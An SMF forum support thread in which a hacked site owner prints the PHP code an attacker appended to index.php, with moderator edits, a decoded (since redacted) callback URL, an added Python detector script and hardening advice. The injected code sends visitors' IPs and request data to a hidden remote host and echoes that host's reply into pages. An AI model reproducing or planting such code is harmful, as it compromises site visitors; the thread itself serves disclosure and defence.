SMF Support > SMF 2.0.x Support

Nasty, Hidden Virus on Simple Machines


igirisjin:
Update ... hacked again.


Site was a bit slow and then AVG Browser Guard started giving warnings. I don't have access logs older than a few days and wouldn't know what to look for anyway. It seems like the index.php file was changed - before the last data in the raw logs, on the 28th of April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.


--- Code: ---<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    // Despite the "bot" comments, this check skips search engines and the Chrome/Opera/Safari
    // families, so only the remaining browsers (e.g. Firefox, IE) trigger the callback below
    if ((strstr($sUserAgent, 'google') == false)
        && (strstr($sUserAgent, 'yahoo') == false)
        && (strstr($sUserAgent, 'baidu') == false)
        && (strstr($sUserAgent, 'msn') == false)
        && (strstr($sUserAgent, 'opera') == false)
        && (strstr($sUserAgent, 'chrome') == false)
        && (strstr($sUserAgent, 'bing') == false)
        && (strstr($sUserAgent, 'safari') == false)
        && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
            // The visitor's IP, User-Agent, host name and requested path are sent to a URL hidden in base64
            $stCurlLink = base64_decode('{snap}') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                . '&useragent=' . urlencode($sUserAgent)
                . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                . '&check=' . isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL)
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
        $sResult = @curl_exec($stCurlHandle);
        // Whatever the remote server answers (when it starts with "O") is echoed straight into the forum page
        if ($sResult[0] == "O")
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>
--- End code ---

(edit: removed base64 string to render code (semi-)unusable)
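The injected block above was appended after index.php's closing tag and combines a base64-hidden URL, a curl callback and an echo of the response. As an added example (not code from the thread or from SMF), the following checks a PHP source for exactly that pattern and compares files against a known-good hash baseline; the sample files, the placeholder base64 string and the indicator regexes are constructed for illustration.

```python
import hashlib
import re

# Constructed sample standing in for SMF's index.php, which ends in a single closing tag.
CLEAN_INDEX = "<?php\nrequire_once('SSI.php');\necho 'forum';\n?>"

# Constructed sample: the same file with a block appended after ?>, modelled on the snippet in this thread.
TAMPERED_INDEX = CLEAN_INDEX + """
<?php
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
$stCurlLink = base64_decode('PLACEHOLDER_B64') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
$h = curl_init($stCurlLink);
$sResult = @curl_exec($h);
echo $sResult;
?>"""

# Traits of the posted snippet (constructed regexes, not a vendor signature).
INDICATORS = {
    "base64_decode(": re.compile(r"base64_decode\s*\("),
    "curl_init(": re.compile(r"curl_init\s*\("),
    "User-Agent filtering": re.compile(r"HTTP_USER_AGENT"),
    "echo of a fetched response": re.compile(r"echo\s+\$\w*Result"),
}

def trailing_block(src: str) -> str:
    """Return whatever follows the first closing ?> tag. Assumes a pure-PHP file with
    one closing tag, as SMF's index.php is; the code in this thread sat exactly there."""
    pos = src.find("?>")
    return "" if pos == -1 else src[pos + 2:].strip()

def scan_php_source(src: str) -> list:
    """Flag appended code and name the injection traits it carries."""
    findings = []
    tail = trailing_block(src)
    if tail:
        findings.append("code appended after the closing ?> tag")
        findings += [f"appended block contains {n}" for n, rx in INDICATORS.items() if rx.search(tail)]
    return findings

def sha256_of(src: str) -> str:
    return hashlib.sha256(src.encode()).hexdigest()

# Baseline from known-good files (e.g. a fresh SMF download); here built from the clean sample.
BASELINE = {"index.php": sha256_of(CLEAN_INDEX)}

def integrity_check(files: dict, baseline: dict) -> dict:
    """Return {path: current digest} for each file whose hash differs from the baseline."""
    return {p: sha256_of(s) for p, s in files.items() if baseline.get(p) != sha256_of(s)}
```

The hash comparison catches any modification, while the trailing-block scan explains what was appended; run both over the whole SMF tree, not just index.php, since the same code can be added to other files.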

nend:
If you decode the base64 that is in the script, you end up with this URL.


--- Code: ---http://{snap}.com/stat/stat.php
--- End code ---

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

青山 素子:
You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site to obfuscate the code and URL a bit so people won't be tempted to try things.

Yoshi:
I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.

Doctor Deejay:
Something you might want to do is add "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)
